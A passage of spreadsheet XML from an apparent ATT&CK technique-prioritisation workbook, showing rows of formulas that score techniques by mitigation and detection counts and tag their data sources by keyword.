        <v>0</v>
      </c>
      <c r="AF604" s="37">
        <v>600</v>
      </c>
      <c r="AG604" s="37" t="str" cm="1">
        <f t="array" ref="AG604">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD604)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH604" s="37">
        <v>600</v>
      </c>
      <c r="AI604" s="37" t="str" cm="1">
        <f t="array" ref="AI604">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD604)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ604" s="37">
        <v>600</v>
      </c>
      <c r="AK604" s="37" t="str" cm="1">
        <f t="array" ref="AK604">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD604)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL604" s="37">
        <v>600</v>
      </c>
      <c r="AM604" s="37" t="str" cm="1">
        <f t="array" ref="AM604">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD604)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN604" s="37">
        <v>0</v>
      </c>
      <c r="AO604" s="37">
        <v>0</v>
      </c>
      <c r="AP604" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ604" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>329.66107299999999</v>
      </c>
      <c r="AR604" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS604" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT604" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU60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05" spans="1:47" ht="34">
      <c r="A605" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B605" s="37">
        <f t="shared" si="9"/>
        <v>1036.4408197619048</v>
      </c>
      <c r="C605" s="37" t="s">
        <v>1960</v>
      </c>
      <c r="D605" s="50" t="s">
        <v>1961</v>
      </c>
      <c r="E605" s="37"/>
      <c r="F605" s="37">
        <v>1</v>
      </c>
      <c r="G605" s="37">
        <v>0</v>
      </c>
      <c r="H605" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I605" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J605" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K605" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L605" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M605" s="37">
        <v>0</v>
      </c>
      <c r="N605" s="56">
        <v>0</v>
      </c>
      <c r="O605" s="56">
        <v>0</v>
      </c>
      <c r="P605" s="56">
        <v>0</v>
      </c>
      <c r="Q605" s="56">
        <v>0</v>
      </c>
      <c r="R605" s="57" t="s">
        <v>1962</v>
      </c>
      <c r="S605" s="57">
        <v>17</v>
      </c>
      <c r="T605" s="57" t="s">
        <v>1963</v>
      </c>
      <c r="U605" s="57">
        <v>23</v>
      </c>
      <c r="V605" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.38095252380952382</v>
      </c>
      <c r="W605" s="37">
        <v>40</v>
      </c>
      <c r="X605" s="37">
        <v>0.72727299999999995</v>
      </c>
      <c r="Y605" s="37">
        <v>0.72727299999999995</v>
      </c>
      <c r="Z605" s="37">
        <v>0</v>
      </c>
      <c r="AA605" s="37">
        <v>0</v>
      </c>
      <c r="AB605" s="37">
        <v>0</v>
      </c>
      <c r="AC605" s="37"/>
      <c r="AD605" s="50" t="s">
        <v>1964</v>
      </c>
      <c r="AE605" s="37" t="str" cm="1">
        <f t="array" ref="AE605">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD605)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF605" s="37">
        <v>601</v>
      </c>
      <c r="AG605" s="37" t="str" cm="1">
        <f t="array" ref="AG605">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD605)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH605" s="37">
        <v>601</v>
      </c>
      <c r="AI605" s="37" t="str" cm="1">
        <f t="array" ref="AI605">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD605)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ605" s="37">
        <v>601</v>
      </c>
      <c r="AK605" s="37" t="str" cm="1">
        <f t="array" ref="AK605">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD605)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL605" s="37">
        <v>601</v>
      </c>
      <c r="AM605" s="37" t="str" cm="1">
        <f t="array" ref="AM605">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD605)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN605" s="37">
        <v>0</v>
      </c>
      <c r="AO605" s="37">
        <v>0</v>
      </c>
      <c r="AP605" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ605" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>345.48027325396828</v>
      </c>
      <c r="AR605" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS605" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT605" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU60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06" spans="1:47" ht="34">
      <c r="A606" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B606" s="37">
        <f t="shared" si="9"/>
        <v>1158.6146298571427</v>
      </c>
      <c r="C606" s="37" t="s">
        <v>1965</v>
      </c>
      <c r="D606" s="50" t="s">
        <v>1961</v>
      </c>
      <c r="E606" s="37" t="s">
        <v>1966</v>
      </c>
      <c r="F606" s="37">
        <v>1</v>
      </c>
      <c r="G606" s="37">
        <v>1</v>
      </c>
      <c r="H606" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I606" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J606" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K606" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L606" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M606" s="37">
        <v>0</v>
      </c>
      <c r="N606" s="56">
        <v>0</v>
      </c>
      <c r="O606" s="56">
        <v>0</v>
      </c>
      <c r="P606" s="56">
        <v>0</v>
      </c>
      <c r="Q606" s="56">
        <v>0</v>
      </c>
      <c r="R606" s="57" t="s">
        <v>1967</v>
      </c>
      <c r="S606" s="57">
        <v>17</v>
      </c>
      <c r="T606" s="57" t="s">
        <v>1963</v>
      </c>
      <c r="U606" s="57">
        <v>23</v>
      </c>
      <c r="V606" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.38095252380952382</v>
      </c>
      <c r="W606" s="37">
        <v>40</v>
      </c>
      <c r="X606" s="37">
        <v>0.72727299999999995</v>
      </c>
      <c r="Y606" s="37">
        <v>0.72727299999999995</v>
      </c>
      <c r="Z606" s="37">
        <v>0</v>
      </c>
      <c r="AA606" s="37">
        <v>0</v>
      </c>
      <c r="AB606" s="37">
        <v>0</v>
      </c>
      <c r="AC606" s="37"/>
      <c r="AD606" s="50" t="s">
        <v>1964</v>
      </c>
      <c r="AE606" s="37" t="str" cm="1">
        <f t="array" ref="AE606">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD606)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF606" s="37">
        <v>602</v>
      </c>
      <c r="AG606" s="37" t="str" cm="1">
        <f t="array" ref="AG606">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD606)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH606" s="37">
        <v>602</v>
      </c>
      <c r="AI606" s="37" t="str" cm="1">
        <f t="array" ref="AI606">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD606)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ606" s="37">
        <v>602</v>
      </c>
      <c r="AK606" s="37" t="str" cm="1">
        <f t="array" ref="AK606">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD606)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL606" s="37">
        <v>602</v>
      </c>
      <c r="AM606" s="37" t="str" cm="1">
        <f t="array" ref="AM606">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD606)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN606" s="37">
        <v>0</v>
      </c>
      <c r="AO606" s="37">
        <v>0</v>
      </c>
      <c r="AP606" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ606" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>386.20487661904758</v>
      </c>
      <c r="AR606" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS606" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT606" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU60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07" spans="1:47" ht="34">
      <c r="A607" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B607" s="37">
        <f t="shared" si="9"/>
        <v>1206.4995403809523</v>
      </c>
      <c r="C607" s="37" t="s">
        <v>1968</v>
      </c>
      <c r="D607" s="50" t="s">
        <v>1961</v>
      </c>
      <c r="E607" s="37" t="s">
        <v>1969</v>
      </c>
      <c r="F607" s="37">
        <v>1</v>
      </c>
      <c r="G607" s="37">
        <v>1</v>
      </c>
      <c r="H607" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I607" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J607" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K607" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L607" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M607" s="37">
        <v>0</v>
      </c>
      <c r="N607" s="56">
        <v>0</v>
      </c>
      <c r="O607" s="56">
        <v>0</v>
      </c>
      <c r="P607" s="56">
        <v>0</v>
      </c>
      <c r="Q607" s="56">
        <v>0</v>
      </c>
      <c r="R607" s="57" t="s">
        <v>1967</v>
      </c>
      <c r="S607" s="57">
        <v>17</v>
      </c>
      <c r="T607" s="57" t="s">
        <v>1963</v>
      </c>
      <c r="U607" s="57">
        <v>25</v>
      </c>
      <c r="V607" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.39999980952380954</v>
      </c>
      <c r="W607" s="37">
        <v>42</v>
      </c>
      <c r="X607" s="37">
        <v>0.76363599999999998</v>
      </c>
      <c r="Y607" s="37">
        <v>0.76363599999999998</v>
      </c>
      <c r="Z607" s="37">
        <v>0</v>
      </c>
      <c r="AA607" s="37">
        <v>0</v>
      </c>
      <c r="AB607" s="37">
        <v>0</v>
      </c>
      <c r="AC607" s="37"/>
      <c r="AD607" s="50" t="s">
        <v>1964</v>
      </c>
      <c r="AE607" s="37" t="str" cm="1">
        <f t="array" ref="AE607">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD607)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF607" s="37">
        <v>603</v>
      </c>
      <c r="AG607" s="37" t="str" cm="1">
        <f t="array" ref="AG607">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD607)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH607" s="37">
        <v>603</v>
      </c>
      <c r="AI607" s="37" t="str" cm="1">
        <f t="array" ref="AI607">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD607)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ607" s="37">
        <v>603</v>
      </c>
      <c r="AK607" s="37" t="str" cm="1">
        <f t="array" ref="AK607">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD607)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL607" s="37">
        <v>603</v>
      </c>
      <c r="AM607" s="37" t="str" cm="1">
        <f t="array" ref="AM607">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD607)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN607" s="37">
        <v>0</v>
      </c>
      <c r="AO607" s="37">
        <v>0</v>
      </c>
      <c r="AP607" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ607" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>402.16651346031745</v>
      </c>
      <c r="AR607" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS607" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT607" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU60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08" spans="1:47" ht="51">
      <c r="A608" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B608" s="37">
        <f t="shared" si="9"/>
        <v>730.85464680952384</v>
      </c>
      <c r="C608" s="37" t="s">
        <v>1970</v>
      </c>
      <c r="D608" s="50" t="s">
        <v>1971</v>
      </c>
      <c r="E608" s="37"/>
      <c r="F608" s="37">
        <v>1</v>
      </c>
      <c r="G608" s="37">
        <v>2</v>
      </c>
      <c r="H608" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.15000000000000002</v>
      </c>
      <c r="I608" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J608" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K608" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L608" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M608" s="37">
        <v>0</v>
      </c>
      <c r="N608" s="56">
        <v>0</v>
      </c>
      <c r="O608" s="56">
        <v>0</v>
      </c>
      <c r="P608" s="56">
        <v>0</v>
      </c>
      <c r="Q608" s="56">
        <v>0</v>
      </c>
      <c r="R608" s="57" t="s">
        <v>1033</v>
      </c>
      <c r="S608" s="57">
        <v>9</v>
      </c>
      <c r="T608" s="57" t="s">
        <v>1972</v>
      </c>
      <c r="U608" s="57">
        <v>7</v>
      </c>
      <c r="V608" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.15238090476190475</v>
      </c>
      <c r="W608" s="37">
        <v>16</v>
      </c>
      <c r="X608" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Y608" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Z608" s="37">
        <v>0</v>
      </c>
      <c r="AA608" s="37">
        <v>0</v>
      </c>
      <c r="AB608" s="37">
        <v>0</v>
      </c>
      <c r="AC608" s="37"/>
      <c r="AD608" s="50" t="s">
        <v>1973</v>
      </c>
      <c r="AE608" s="37" t="str" cm="1">
        <f t="array" ref="AE608">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD608)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF608" s="37">
        <v>604</v>
      </c>
      <c r="AG608" s="37" t="str" cm="1">
        <f t="array" ref="AG608">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD608)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH608" s="37">
        <v>604</v>
      </c>
      <c r="AI608" s="37" t="str" cm="1">
        <f t="array" ref="AI608">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD608)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ608" s="37">
        <v>604</v>
      </c>
      <c r="AK608" s="37" t="str" cm="1">
        <f t="array" ref="AK608">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD608)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL608" s="37">
        <v>604</v>
      </c>
      <c r="AM608" s="37" t="str" cm="1">
        <f t="array" ref="AM608">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD608)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN608" s="37">
        <v>0</v>
      </c>
      <c r="AO608" s="37">
        <v>0</v>
      </c>
      <c r="AP608" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ608" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>243.6182156031746</v>
      </c>
      <c r="AR608" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS608" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT608" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU60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09" spans="1:47" ht="34">
      <c r="A609" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B609" s="37">
        <f t="shared" si="9"/>
        <v>472.67119800000006</v>
      </c>
      <c r="C609" s="37" t="s">
        <v>1974</v>
      </c>
      <c r="D609" s="50" t="s">
        <v>1971</v>
      </c>
      <c r="E609" s="37" t="s">
        <v>1975</v>
      </c>
      <c r="F609" s="37">
        <v>1</v>
      </c>
      <c r="G609" s="37">
        <v>1</v>
      </c>
      <c r="H609" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I609" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J609" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K609" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L609" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M609" s="37">
        <v>0</v>
      </c>
      <c r="N609" s="56">
        <v>0</v>
      </c>
      <c r="O609" s="56">
        <v>0</v>
      </c>
      <c r="P609" s="56">
        <v>0</v>
      </c>
      <c r="Q609" s="56">
        <v>0</v>
      </c>
      <c r="R609" s="57" t="s">
        <v>1976</v>
      </c>
      <c r="S609" s="57">
        <v>6</v>
      </c>
      <c r="T609" s="57" t="s">
        <v>1977</v>
      </c>
      <c r="U609" s="57">
        <v>4</v>
      </c>
      <c r="V609" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.5238000000000003E-2</v>
      </c>
      <c r="W609" s="37">
        <v>10</v>
      </c>
      <c r="X609" s="37">
        <v>0.18181800000000001</v>
      </c>
      <c r="Y609" s="37">
        <v>0.18181800000000001</v>
      </c>
      <c r="Z609" s="37">
        <v>0</v>
      </c>
      <c r="AA609" s="37">
        <v>0</v>
      </c>
      <c r="AB609" s="37">
        <v>0</v>
      </c>
      <c r="AC609" s="37"/>
      <c r="AD609" s="50" t="s">
        <v>1978</v>
      </c>
      <c r="AE609" s="37" t="str" cm="1">
        <f t="array" ref="AE609">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD609)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF609" s="37">
        <v>605</v>
      </c>
      <c r="AG609" s="37" t="str" cm="1">
        <f t="array" ref="AG609">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD609)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH609" s="37">
        <v>605</v>
      </c>
      <c r="AI609" s="37" t="str" cm="1">
        <f t="array" ref="AI609">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD609)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ609" s="37">
        <v>605</v>
      </c>
      <c r="AK609" s="37" t="str" cm="1">
        <f t="array" ref="AK609">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD609)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL609" s="37">
        <v>605</v>
      </c>
      <c r="AM609" s="37" t="str" cm="1">
        <f t="array" ref="AM609">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD609)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN609" s="37">
        <v>0</v>
      </c>
      <c r="AO609" s="37">
        <v>0</v>
      </c>
      <c r="AP609" s="37">
